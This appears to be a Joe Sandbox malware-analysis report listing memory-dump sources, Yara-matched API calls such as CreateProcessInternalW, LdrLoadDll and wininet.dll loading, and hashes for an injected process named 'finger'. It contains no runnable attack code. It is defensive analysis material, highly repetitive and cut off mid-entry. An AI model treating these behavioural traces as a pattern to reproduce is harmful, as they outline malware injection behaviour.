                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 20e4099cf57208bd50ab80fbe3f3113fff85d85b02f75109f06bab96a161748a
                                                                                                      • Instruction ID: 0d0d79fcbdbbb92385393fe1b3566d561b259f52ff2dbb4b622891e4b99a3e5b
                                                                                                      • Opcode Fuzzy Hash: 20e4099cf57208bd50ab80fbe3f3113fff85d85b02f75109f06bab96a161748a
                                                                                                      • Instruction Fuzzy Hash: D3900225222804021145F558460450B049997D7351395C055F141A590CC72189696321
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 9bd6633cbd8ac366ffa44835d6721979904c3b5f01ca12685f83934bed639d81
                                                                                                      • Instruction ID: 2aedbbce88a9fe17b2617643a440c63bef068831c67090d83b38b8794aaeaba8
                                                                                                      • Opcode Fuzzy Hash: 9bd6633cbd8ac366ffa44835d6721979904c3b5f01ca12685f83934bed639d81
                                                                                                      • Instruction Fuzzy Hash: 8A90026134280842E100B1588414B060059C7E2301F55C055F1068554D8719CD567126
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 3a28ade060cc87f7c0328ca97c868271987a141ee91494b3f8cd1420bac318dc
                                                                                                      • Instruction ID: f1565f3689fb971d4777d7a07cb023aa98d3532139884e4f07251d7834f3ecb7
                                                                                                      • Opcode Fuzzy Hash: 3a28ade060cc87f7c0328ca97c868271987a141ee91494b3f8cd1420bac318dc
                                                                                                      • Instruction Fuzzy Hash: A1900221602804425140B168C8449064059ABE2211755C161B099C550D865989696665
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 302aa20a1e236ec457c7e05bcf8f9bfbd71e3e8a08576f36a0cac29036b24d56
                                                                                                      • Instruction ID: 5615b244c06202d83a8cef2a7c9b24c4d8cf3471482ea0425ef7a74df08d2d43
                                                                                                      • Opcode Fuzzy Hash: 302aa20a1e236ec457c7e05bcf8f9bfbd71e3e8a08576f36a0cac29036b24d56
                                                                                                      • Instruction Fuzzy Hash: 2C900221212C0442E200B5688C14B07005987D1303F55C155B0158554CCA1589656521
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: d2d9204d9c0bc01346749ef25e0a41bf82792f747d575c1349166af1452d2797
                                                                                                      • Instruction ID: afcd91bbf24505683f7193c984c5611a8bc6f3e83c60a273f37bfd439f23021d
                                                                                                      • Opcode Fuzzy Hash: d2d9204d9c0bc01346749ef25e0a41bf82792f747d575c1349166af1452d2797
                                                                                                      • Instruction Fuzzy Hash: 5390022160280902E101B1588404616005E87D1241F95C062B1028555ECB258A96B131
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: e39a56244ec3fbdb26c2d852ad0de92926ee3d63fb7dadfc360edb32a06a4a8f
                                                                                                      • Instruction ID: 167267be5ed98d407929290894021219f483958a4c53c9664c0df9f4bb84d8d6
                                                                                                      • Opcode Fuzzy Hash: e39a56244ec3fbdb26c2d852ad0de92926ee3d63fb7dadfc360edb32a06a4a8f
                                                                                                      • Instruction Fuzzy Hash: 45900261202C0803E140B5588804607005987D1302F55C051B2068555E8B298D557135
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 40708a5429867108cd382ce9f5b7e2a7be97dba139fbe84fa234e9212d71ddad
                                                                                                      • Instruction ID: 4847525013689d74950542cc60a09fe8d410ce54cf810aebb9d8bb8832f10ab0
                                                                                                      • Opcode Fuzzy Hash: 40708a5429867108cd382ce9f5b7e2a7be97dba139fbe84fa234e9212d71ddad
                                                                                                      • Instruction Fuzzy Hash: 2790022921380402E180B158940860A005987D2202F95D455B0019558CCA15896D6321
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 215079f404f7ebb71e4eae497a19a8c8a1e198b474ffd1d32c5dcc7cd40785b2
                                                                                                      • Instruction ID: 1455f266d0720b6e0476ed0ff021a6546655f71d6f8c54831abfcab9752c5dd4
                                                                                                      • Opcode Fuzzy Hash: 215079f404f7ebb71e4eae497a19a8c8a1e198b474ffd1d32c5dcc7cd40785b2
                                                                                                      • Instruction Fuzzy Hash: 7D90022130280403E140B15894186064059D7E2301F55D051F0418554CDA15895A6222
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: c3488541025b8a270e1cc73747147a381f2335096654753d7afd23a76502bc66
                                                                                                      • Instruction ID: b1bfd70e96ec835e2c326ac07ab6d2c27fa54825f967efd5fe59212b068d16f2
                                                                                                      • Opcode Fuzzy Hash: c3488541025b8a270e1cc73747147a381f2335096654753d7afd23a76502bc66
                                                                                                      • Instruction Fuzzy Hash: 8F900221243845526545F1588404507405A97E1241795C052B1418950C8626995AE621
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 12916c2c462bf46cf19f95c47b0fb3b712574ea4b600b558db2e3ed2bfe94007
                                                                                                      • Instruction ID: f12b3ede8e1a04189d100b16fce6d31c0eb0eb9f8deb2098073aacebb5533ac3
                                                                                                      • Opcode Fuzzy Hash: 12916c2c462bf46cf19f95c47b0fb3b712574ea4b600b558db2e3ed2bfe94007
                                                                                                      • Instruction Fuzzy Hash: C190023120280813E111B1588504707005D87D1241F95C452B0428558D97568A56B121
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: d57cd99bf2e934c51e0996fef19b627602f4e26be5fa986c22ff92af269304db
                                                                                                      • Instruction ID: 3afe44a574429e4fe4be027aac3f7c5bc8f13d64cf507cc62dec844a48406e30
                                                                                                      • Opcode Fuzzy Hash: d57cd99bf2e934c51e0996fef19b627602f4e26be5fa986c22ff92af269304db
                                                                                                      • Instruction Fuzzy Hash: A590023120280C42E100B1588404B46005987E1301F55C056B0128654D8715C9557521
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: e4993c20255bffeb6cf1165a2b29f474ef42376eecc65a5d05f0a2ec738925e5
                                                                                                      • Instruction ID: 3e0d75a8e07d6976c6a4114d28d5806d850c88b1729b33df0e59c502fcb5414f
                                                                                                      • Opcode Fuzzy Hash: e4993c20255bffeb6cf1165a2b29f474ef42376eecc65a5d05f0a2ec738925e5
                                                                                                      • Instruction Fuzzy Hash: 1690023120288C02E110B158C40474A005987D1301F59C451B4428658D879589957121
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: fb98b2a0edd45bde48ba93c4f3e4543b3157adecd88c018a86ddde42d3869bbc
                                                                                                      • Instruction ID: f5aac4ed98ff0a6bac57123d256ed95e44852148e1b789afe26832a9b1c47057
                                                                                                      • Opcode Fuzzy Hash: fb98b2a0edd45bde48ba93c4f3e4543b3157adecd88c018a86ddde42d3869bbc
                                                                                                      • Instruction Fuzzy Hash: 2290023120280802E100B5989408646005987E1301F55D051B5028555EC76589957131
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: fc9fb80cdefd403381afd5d312c2587bea6353664784a5ddfffaabf64af5ffe4
                                                                                                      • Instruction ID: 574b5f4470934903b0ee043e45e0ab60613d370e32faae80786205c68c54421f
                                                                                                      • Opcode Fuzzy Hash: fc9fb80cdefd403381afd5d312c2587bea6353664784a5ddfffaabf64af5ffe4
                                                                                                      • Instruction Fuzzy Hash: 7F90023160690802E100B1588514706105987D1201F65C451B0428568D87958A5575A2
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 57a8feb081fead6fea6629b00a79bb62b45d94008b319480ab49dd1aab5f9a64
                                                                                                      • Instruction ID: 9fe46e2eb082c442688c343ae34063b5486e2fce9c3328cf646e216ae8fb67f9
                                                                                                      • Opcode Fuzzy Hash: 57a8feb081fead6fea6629b00a79bb62b45d94008b319480ab49dd1aab5f9a64
                                                                                                      • Instruction Fuzzy Hash: D190022124685502E150B15C84046164059A7E1201F55C061B0818594D865589597221

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 518 600f69-600fde call 61b760 call 61c170 call 604700 call 5f13e0 call 611e40 530 601000-601005 518->530 531 600fe0-600ff1 PostThreadMessageW 518->531 531->530 532 600ff3-600ffd 531->532 532->530
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00600FED
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 40F193-3PQ$40F193-3PQ
                                                                                                      • API String ID: 1836367815-1005098266
                                                                                                      • Opcode ID: 97573ca473f30ff0083e82b3b7025720e141c8b42e374edf9a4bd21b38e2e68e
                                                                                                      • Instruction ID: 595a6a4e6411d7c7722e4ab9dba2ba286cbbc1945f5aa5a12dff34180fe6096d
                                                                                                      • Opcode Fuzzy Hash: 97573ca473f30ff0083e82b3b7025720e141c8b42e374edf9a4bd21b38e2e68e
                                                                                                      • Instruction Fuzzy Hash: 3C11A571E40258B6EB2196908C42FDF7B7C9F41B90F048058FB04BB2C1DA746A0687E9

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 502 600f5c-600f5d 503 600f7c-600f82 502->503 504 600f5f-600f67 502->504 505 600f89-600fde call 61c170 call 604700 call 5f13e0 call 611e40 503->505 506 600f84 call 61b760 503->506 515 601000-601005 505->515 516 600fe0-600ff1 PostThreadMessageW 505->516 506->505 516->515 517 600ff3-600ffd 516->517 517->515
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00600FED
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 40F193-3PQ$40F193-3PQ
                                                                                                      • API String ID: 1836367815-1005098266
                                                                                                      • Opcode ID: 62ac509af513badd59f52ff932e67a1d51426ef96a03da2f40b57a8547a2cddc
                                                                                                      • Instruction ID: a71887ed99f660986f3710f8c2e7472224f6d4882c529cb0f9f00ca5013ad93f
                                                                                                      • Opcode Fuzzy Hash: 62ac509af513badd59f52ff932e67a1d51426ef96a03da2f40b57a8547a2cddc
                                                                                                      • Instruction Fuzzy Hash: 3C01F932E81258B6EB219690AC42FEFBB6D9F42750F048159FF14BF3C0DA75590287D9

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 533 600f70-600fde call 61b760 call 61c170 call 604700 call 5f13e0 call 611e40 544 601000-601005 533->544 545 600fe0-600ff1 PostThreadMessageW 533->545 545->544 546 600ff3-600ffd 545->546 546->544
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00600FED
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 40F193-3PQ$40F193-3PQ
                                                                                                      • API String ID: 1836367815-1005098266
                                                                                                      • Opcode ID: 5b2c7bf13fbc1386b4dce6a31997c1ee6d6986f9ba4028ad4039b86e24a1e116
                                                                                                      • Instruction ID: 249d07b56e4ea2cd0ab0931d0f9e8178a0fda01abcb5868e268964f604830784
                                                                                                      • Opcode Fuzzy Hash: 5b2c7bf13fbc1386b4dce6a31997c1ee6d6986f9ba4028ad4039b86e24a1e116
                                                                                                      • Instruction Fuzzy Hash: 3B019671D41358B6EB2196908C42FDFBB7C9F41B90F148059FB04BF2C1DA746A068BE9
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 00613D4D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Sleep
                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                      • Opcode ID: 9685e4fba9fc834a698779fa1371a8dd9465bdcaa9f451465d72ec142213eb0f
                                                                                                      • Instruction ID: 8ecc0c962441f5437a3ce340c48af91a2da21b08dbdbb690f08d8659dfe02830
                                                                                                      • Opcode Fuzzy Hash: 9685e4fba9fc834a698779fa1371a8dd9465bdcaa9f451465d72ec142213eb0f
                                                                                                      • Instruction Fuzzy Hash: 21316EB1A01305BBD714DFA4D881FEAB7B9FF88714F04811CF659AB285D770AA40CBA4
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeUninitialize
                                                                                                      • String ID: @J7<
                                                                                                      • API String ID: 3442037557-2016760708
                                                                                                      • Opcode ID: 9c88c4023dbabb63ce3517aee62a2f75d88881334ea293935199495fb9da40bb
                                                                                                      • Instruction ID: cd47b1f99fd761d3b1f050d45a22248055c197f4469a75d31a2b20dff7c045d9
                                                                                                      • Opcode Fuzzy Hash: 9c88c4023dbabb63ce3517aee62a2f75d88881334ea293935199495fb9da40bb
                                                                                                      • Instruction Fuzzy Hash: A8313EB6A0020A9FDB14DFD8D8809EFB7BABF88304B108559E505EB244D775AE45CBA1
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeUninitialize
                                                                                                      • String ID: @J7<
                                                                                                      • API String ID: 3442037557-2016760708
                                                                                                      • Opcode ID: b93f0931f0eea652ec0d38269af57df06c3462037f8469147fee7db7124a2835
                                                                                                      • Instruction ID: 65e931ddf3f538e2aac89e2d38e3cc27eb689e08987afe079cd8a327a0dcea2c
                                                                                                      • Opcode Fuzzy Hash: b93f0931f0eea652ec0d38269af57df06c3462037f8469147fee7db7124a2835
                                                                                                      • Instruction Fuzzy Hash: 7A3150B5A0020A9FDB14DFD8D8809EFB3BABF88304B108559E505EB344D775EE45CBA1
                                                                                                      APIs
                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 006199B9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FreeHeap
                                                                                                      • String ID: [4`
                                                                                                      • API String ID: 3298025750-1764788972
                                                                                                      • Opcode ID: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                                                                      • Instruction ID: 8586cd9decbc24a24c659218793562cd89712f3cbc5a62a0acf939f872cc95c8
                                                                                                      • Opcode Fuzzy Hash: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                                                                      • Instruction Fuzzy Hash: 59E09272200204BBD610EF59DC45EEB37ADEFC9710F004408FD09A7242C771B8118BB9
                                                                                                      APIs
                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00604772
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Load
                                                                                                      • String ID:
                                                                                                      • API String ID: 2234796835-0
                                                                                                      • Opcode ID: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                                                                      • Instruction ID: 10ba5668027cea9be14281cc8111fcdb7577559fc9724b6860b9fad98a5159d4
                                                                                                      • Opcode Fuzzy Hash: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                                                                      • Instruction Fuzzy Hash: 3D0171B5D4020DABDF54EBE4EC42FDEB3799B54318F044198EA0897281FA30EB44CB91
                                                                                                      APIs
                                                                                                      • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,006084CE,00000010,?,?,?,00000044,?,00000010,006084CE,?,00000000,?), ref: 00619A60
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateInternalProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 2186235152-0
                                                                                                      • Opcode ID: 3473fbc84f5de4e9ef638430524f151b17afe93dbc7687943e0913540f186df8
